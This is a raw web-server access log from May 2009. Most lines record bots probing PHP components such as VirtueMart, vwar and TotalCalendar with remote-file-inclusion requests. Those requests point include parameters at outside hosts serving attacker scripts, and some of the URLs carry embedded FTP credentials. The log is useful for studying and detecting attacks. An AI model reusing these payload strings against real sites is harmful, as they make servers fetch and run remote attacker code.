210.239.42.208 - - [08/May/2009:02:18:37 -0400] "GET /logs///vwar/backup/errors.php?error=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt?? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
210.239.42.208 - - [08/May/2009:02:19:11 -0400] "GET /logs/access_log.Q108091400///vwar/backup/errors.php?error=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
122.116.178.20 - - [08/May/2009:02:19:27 -0400] "GET /logs/access_log.Q108082300//modules/4nAlbum/public/displayCategory.php?basepath=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
92.43.20.6 - - [08/May/2009:02:19:29 -0400] "GET //index.php?DOCUMENT_ROOT=http://jianshenonline.com/mail/mail/FX29ID1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
92.43.20.6 - - [08/May/2009:02:19:29 -0400] "GET /logs/access_log.Q108082200//index.php?DOCUMENT_ROOT=http://jianshenonline.com/mail/mail/FX29ID1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
91.195.124.10 - - [08/May/2009:02:19:34 -0400] "GET /?sourcedir=http://indoirc.go.ro/id1.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
91.195.124.10 - - [08/May/2009:02:19:34 -0400] "GET /logs/?sourcedir=http://indoirc.go.ro/id1.txt?? HTTP/1.1" 200 480 "-" "Mozilla/5.0"
91.195.124.10 - - [08/May/2009:02:19:34 -0400] "GET /logs/access_log.Q108090500/?sourcedir=http://indoirc.go.ro/id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
91.195.124.10 - - [08/May/2009:02:19:34 -0400] "GET /logs/access_log.Q108111500/?sourcedir=http://indoirc.go.ro/id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
67.204.25.53 - - [08/May/2009:02:19:34 -0400] "GET /logs/access_log.Q108110200/modules/tinycontent/admin/index.php?spaw_root=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.803"
67.204.25.53 - - [08/May/2009:02:19:34 -0400] "GET /modules/tinycontent/admin/index.php?spaw_root=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
67.204.25.53 - - [08/May/2009:02:19:34 -0400] "GET /logs/modules/tinycontent/admin/index.php?spaw_root=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 238 "-" "libwww-perl/5.803"
69.94.30.156 - - [08/May/2009:02:19:35 -0400] "GET /logs/access_log.Q108060700/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
86.54.102.45 - - [08/May/2009:02:19:36 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
86.54.102.45 - - [08/May/2009:02:19:36 -0400] "GET /logs/access_log.Q108082100///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
86.54.102.45 - - [08/May/2009:02:19:36 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
69.89.31.105 - - [08/May/2009:02:19:37 -0400] "GET /logs/access_log.Q108110200/modules/tinycontent/admin/index.php?spaw_root=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.812"
69.89.31.105 - - [08/May/2009:02:19:37 -0400] "GET /modules/tinycontent/admin/index.php?spaw_root=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.812"
69.89.31.105 - - [08/May/2009:02:19:37 -0400] "GET /logs/modules/tinycontent/admin/index.php?spaw_root=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 238 "-" "libwww-perl/5.812"
122.116.178.20 - - [08/May/2009:02:19:38 -0400] "GET /logs/access_log.Q108082300//modules/4nAlbum/public/displayCategory.php?basepath=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
122.116.178.20 - - [08/May/2009:02:19:39 -0400] "GET /logs/access_log.Q108083100//modules/4nAlbum/public/displayCategory.php?basepath=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
122.116.178.20 - - [08/May/2009:02:19:43 -0400] "GET /logs/access_log.Q108083100//modules/4nAlbum/public/displayCategory.php?basepath=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
92.43.20.6 - - [08/May/2009:02:19:47 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://jianshenonline.com/mail/mail/FX29ID1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
124.0.54.98 - - [08/May/2009:02:19:48 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
124.0.54.98 - - [08/May/2009:02:19:48 -0400] "GET /logs/access_log.Q108100100%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
124.0.54.98 - - [08/May/2009:02:19:48 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
88.84.128.40 - - [08/May/2009:02:19:55 -0400] "GET /logs/access_log.Q108110200/modules/tinycontent/admin/index.php?spaw_root=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.803"
88.84.128.40 - - [08/May/2009:02:19:55 -0400] "GET /modules/tinycontent/admin/index.php?spaw_root=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
88.84.128.40 - - [08/May/2009:02:19:56 -0400] "GET /logs/modules/tinycontent/admin/index.php?spaw_root=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 238 "-" "libwww-perl/5.803"
209.59.12.99 - - [08/May/2009:02:19:56 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
124.0.54.98 - - [08/May/2009:02:20:06 -0400] "GET /logs/access_log.Q109021500%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
195.20.225.45 - - [08/May/2009:02:20:44 -0400] "GET /logs/access_log.Q108100400//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
195.20.225.45 - - [08/May/2009:02:20:44 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 216 "-" "libwww-perl/5.805"
195.20.225.45 - - [08/May/2009:02:20:44 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 221 "-" "libwww-perl/5.805"
86.54.102.45 - - [08/May/2009:02:20:57 -0400] "GET /logs/access_log.Q108100100///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
92.43.20.6 - - [08/May/2009:02:20:59 -0400] "GET /logs/access_log.Q108072300//index.php?DOCUMENT_ROOT=http://jianshenonline.com/mail/mail/FX29ID1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
91.195.124.10 - - [08/May/2009:02:21:15 -0400] "GET /logs/access_log.Q108090500%20%20/?sourcedir=http://indoirc.go.ro/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
91.195.124.10 - - [08/May/2009:02:21:15 -0400] "GET /logs/access_log.Q108111500%20%20/?sourcedir=http://indoirc.go.ro/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
86.54.102.45 - - [08/May/2009:02:21:16 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
86.54.102.45 - - [08/May/2009:02:21:16 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
86.54.102.45 - - [08/May/2009:02:21:16 -0400] "GET /logs/access_log.Q108091400///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
86.54.102.45 - - [08/May/2009:02:21:17 -0400] "GET /logs/access_log.Q108103000///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
110.45.146.146 - - [08/May/2009:02:21:21 -0400] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
110.45.146.146 - - [08/May/2009:02:21:21 -0400] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
110.45.146.146 - - [08/May/2009:02:21:22 -0400] "GET /logs/access_log.Q109041500//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
91.195.124.10 - - [08/May/2009:02:21:31 -0400] "GET /logs/access_log.Q108082200%20%20//index.php?DOCUMENT_ROOT=http://indoirc.go.ro/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
91.195.124.10 - - [08/May/2009:02:21:36 -0400] "GET /logs/access_log.Q108072300%20%20//index.php?DOCUMENT_ROOT=http://indoirc.go.ro/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
86.54.102.45 - - [08/May/2009:02:21:48 -0400] "GET /logs/access_log.Q108082100%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
110.45.146.146 - - [08/May/2009:02:21:50 -0400] "GET /logs/access_log.Q109041500%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
110.45.146.146 - - [08/May/2009:02:22:17 -0400] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
110.45.146.146 - - [08/May/2009:02:22:17 -0400] "GET /logs/access_log.Q109011700//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
110.45.146.146 - - [08/May/2009:02:22:17 -0400] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
115.145.170.177 - - [08/May/2009:02:22:33 -0400] "GET /logs/access_log.Q109042600//?_zb_path=http://ssdnb.net/bbs/vo.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
115.145.170.177 - - [08/May/2009:02:22:33 -0400] "GET //?_zb_path=http://ssdnb.net/bbs/vo.txt?? HTTP/1.1" 200 452 "-" "libwww-perl/5.805"
115.145.170.177 - - [08/May/2009:02:22:34 -0400] "GET /logs//?_zb_path=http://ssdnb.net/bbs/vo.txt?? HTTP/1.1" 200 485 "-" "libwww-perl/5.805"
110.45.146.146 - - [08/May/2009:02:22:34 -0400] "GET /logs/access_log.Q109041900%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
195.20.225.45 - - [08/May/2009:02:22:44 -0400] "GET /logs/error_log.Q108100400//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
86.54.102.45 - - [08/May/2009:02:22:54 -0400] "GET /logs/access_log.Q108091400%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
86.54.102.45 - - [08/May/2009:02:22:54 -0400] "GET /logs/access_log.Q108103000%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
110.45.146.146 - - [08/May/2009:02:23:02 -0400] "GET /send_reminders.php?includedir=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
110.45.146.146 - - [08/May/2009:02:23:02 -0400] "GET /logs/send_reminders.php?includedir=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
110.45.146.146 - - [08/May/2009:02:23:02 -0400] "GET /logs/access_log.Q108071300/send_reminders.php?includedir=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
110.45.146.146 - - [08/May/2009:02:23:02 -0400] "GET /logs/access_log.Q108063000/send_reminders.php?includedir=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
110.45.146.146 - - [08/May/2009:02:23:04 -0400] "GET /logs/access_log.Q109011700%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
116.121.201.70 - - [08/May/2009:02:23:05 -0400] "GET /logs/access_log.Q109042600//?_zb_path=http://ssdnb.net/bbs/vo.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.65"
116.121.201.70 - - [08/May/2009:02:23:06 -0400] "GET //?_zb_path=http://ssdnb.net/bbs/vo.txt?? HTTP/1.1" 200 452 "-" "libwww-perl/5.65"
116.121.201.70 - - [08/May/2009:02:23:06 -0400] "GET /logs//?_zb_path=http://ssdnb.net/bbs/vo.txt?? HTTP/1.1" 200 485 "-" "libwww-perl/5.65"
74.6.8.112 - - [08/May/2009:02:23:09 -0400] "GET /logs/access_log.Q109021300 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
69.89.31.105 - - [08/May/2009:02:23:28 -0400] "GET /logs/error_log.Q108021700/modules/tinycontent/admin/index.php?spaw_root=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 259 "-" "libwww-perl/5.812"
67.204.25.53 - - [08/May/2009:02:23:31 -0400] "GET /logs/error_log.Q108021700/modules/tinycontent/admin/index.php?spaw_root=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 259 "-" "libwww-perl/5.803"
110.45.146.146 - - [08/May/2009:02:24:05 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
110.45.146.146 - - [08/May/2009:02:24:05 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
110.45.146.146 - - [08/May/2009:02:24:05 -0400] "GET /logs/access_log.Q108100900%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
202.53.250.98 - - [08/May/2009:02:24:12 -0400] "GET /logs/convert/mvcw.php?vwar_root=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 219 "-" "libwww-perl/5.805"
218.38.54.141 - - [08/May/2009:02:24:27 -0400] "GET /logs//?prefix=http://www.jspipesanddrums.com/photos/footer.gif?? HTTP/1.1" 200 485 "-" "Microsoft Pocket Internet Explorer/0.6"
218.38.54.141 - - [08/May/2009:02:24:27 -0400] "GET //?prefix=http://www.jspipesanddrums.com/photos/footer.gif?? HTTP/1.1" 200 452 "-" "Microsoft Pocket Internet Explorer/0.6"
115.145.170.177 - - [08/May/2009:02:24:29 -0400] "GET /logs/access_log.Q108112400//?_zb_path=http://ssdnb.net/bbs/vo.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
88.84.128.40 - - [08/May/2009:02:24:33 -0400] "GET /logs/error_log.Q108021700/modules/tinycontent/admin/index.php?spaw_root=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 259 "-" "libwww-perl/5.803"
116.121.201.70 - - [08/May/2009:02:24:52 -0400] "GET /logs/access_log.Q108112400//?_zb_path=http://ssdnb.net/bbs/vo.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.65"
209.59.12.99 - - [08/May/2009:02:24:55 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
110.45.146.146 - - [08/May/2009:02:25:04 -0400] "GET /logs/access_log.Q108071300%20%20/send_reminders.php?includedir=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
110.45.146.146 - - [08/May/2009:02:25:04 -0400] "GET /logs/access_log.Q108063000%20%20/send_reminders.php?includedir=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
110.45.146.146 - - [08/May/2009:02:25:07 -0400] "GET /logs/access_log.Q108052400%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
61.19.241.61 - - [08/May/2009:02:25:29 -0400] "GET //modules/TotalCalendar/about.php?inc_dir=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 230 "-" "libwww-perl/5.811"
61.19.241.61 - - [08/May/2009:02:25:29 -0400] "GET /logs/access_log.Q108092700//modules/TotalCalendar/about.php?inc_dir=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 257 "-" "libwww-perl/5.811"
61.19.241.61 - - [08/May/2009:02:25:32 -0400] "GET /logs//modules/TotalCalendar/about.php?inc_dir=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
211.115.213.66 - - [08/May/2009:02:25:42 -0400] "GET /logs//modules/TotalCalendar/about.php?inc_dir=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
211.115.213.66 - - [08/May/2009:02:25:42 -0400] "GET //modules/TotalCalendar/about.php?inc_dir=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 230 "-" "libwww-perl/5.79"
211.115.213.66 - - [08/May/2009:02:25:42 -0400] "GET /logs/access_log.Q108092700//modules/TotalCalendar/about.php?inc_dir=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 257 "-" "libwww-perl/5.79"
110.45.146.146 - - [08/May/2009:02:25:44 -0400] "GET /logs/access_log.Q108122100%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
77.221.130.2 - - [08/May/2009:02:25:44 -0400] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
77.221.130.2 - - [08/May/2009:02:25:44 -0400] "GET /logs/access_log.Q108060400//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
77.221.130.2 - - [08/May/2009:02:25:46 -0400] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
77.221.130.2 - - [08/May/2009:02:25:51 -0400] "GET /logs/access_log.Q109011000//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
61.19.241.61 - - [08/May/2009:02:25:55 -0400] "GET /logs/access_log.Q108092700//modules/TotalCalendar/about.php?inc_dir=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 257 "-" "libwww-perl/5.811"
61.19.241.61 - - [08/May/2009:02:25:57 -0400] "GET //modules/TotalCalendar/about.php?inc_dir=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 230 "-" "libwww-perl/5.811"
61.19.241.61 - - [08/May/2009:02:25:57 -0400] "GET /logs//modules/TotalCalendar/about.php?inc_dir=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
74.6.8.112 - - [08/May/2009:02:26:41 -0400] "GET /logs/access_log.Q108121100 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
124.0.54.98 - - [08/May/2009:02:27:12 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
74.6.8.112 - - [08/May/2009:02:27:13 -0400] "GET /logs/access_log.Q107091000 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
124.0.54.98 - - [08/May/2009:02:27:15 -0400] "GET /logs/access_log.Q108082100///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
124.0.54.98 - - [08/May/2009:02:27:17 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
110.45.146.146 - - [08/May/2009:02:27:17 -0400] "GET /logs/access_log.Q108100100//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
110.45.146.146 - - [08/May/2009:02:27:17 -0400] "GET /logs/access_log.Q108090100//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
124.0.54.98 - - [08/May/2009:02:27:33 -0400] "GET /logs/access_log.Q108112200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
61.19.241.61 - - [08/May/2009:02:27:40 -0400] "GET /logs/access_log.Q109020700//modules/TotalCalendar/about.php?inc_dir=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 257 "-" "libwww-perl/5.811"
61.19.241.61 - - [08/May/2009:02:27:50 -0400] "GET /logs/access_log.Q109020700//modules/TotalCalendar/about.php?inc_dir=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 257 "-" "libwww-perl/5.811"
86.54.102.45 - - [08/May/2009:02:28:04 -0400] "GET /logs/access_log.Q108092400///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
195.20.225.45 - - [08/May/2009:02:28:11 -0400] "GET /logs/access_log.Q108100400//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
195.20.225.45 - - [08/May/2009:02:28:11 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 216 "-" "libwww-perl/5.805"
195.20.225.45 - - [08/May/2009:02:28:11 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 221 "-" "libwww-perl/5.805"
195.20.225.45 - - [08/May/2009:02:28:33 -0400] "GET /logs/access_log.Q108100400//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 243 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
195.20.225.45 - - [08/May/2009:02:28:33 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 216 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
61.19.241.61 - - [08/May/2009:02:28:36 -0400] "GET /logs/error_log.Q108080800/config.php?path_to_root=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 234 "-" "libwww-perl/5.811"
77.221.130.2 - - [08/May/2009:02:28:52 -0400] "GET /logs/access_log.Q108060400%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
116.121.201.70 - - [08/May/2009:02:28:54 -0400] "GET /logs/access_log.Q109042600//?_zb_path=http://ssdnb.net/bbs/vo.txt? HTTP/1.1" 404 226 "-" "libwww-perl/5.65"
116.121.201.70 - - [08/May/2009:02:28:55 -0400] "GET //?_zb_path=http://ssdnb.net/bbs/vo.txt? HTTP/1.1" 200 452 "-" "libwww-perl/5.65"
116.121.201.70 - - [08/May/2009:02:28:55 -0400] "GET /logs//?_zb_path=http://ssdnb.net/bbs/vo.txt? HTTP/1.1" 200 485 "-" "libwww-perl/5.65"
77.221.130.2 - - [08/May/2009:02:28:57 -0400] "GET /logs/access_log.Q109011000%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
60.199.213.88 - - [08/May/2009:02:29:07 -0400] "GET /errors.php?error=http://212.227.74.68/catalog/test.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
195.20.225.45 - - [08/May/2009:02:29:22 -0400] "GET /logs/access_log.Q108102500//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 243 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
110.45.146.146 - - [08/May/2009:02:29:27 -0400] "GET /logs/access_log.Q108100900//modules/vwar/admin/admin.php?vwar_root=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
124.0.54.98 - - [08/May/2009:02:29:39 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
124.0.54.98 - - [08/May/2009:02:29:40 -0400] "GET /logs/access_log.Q108091400///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
124.0.54.98 - - [08/May/2009:02:29:41 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
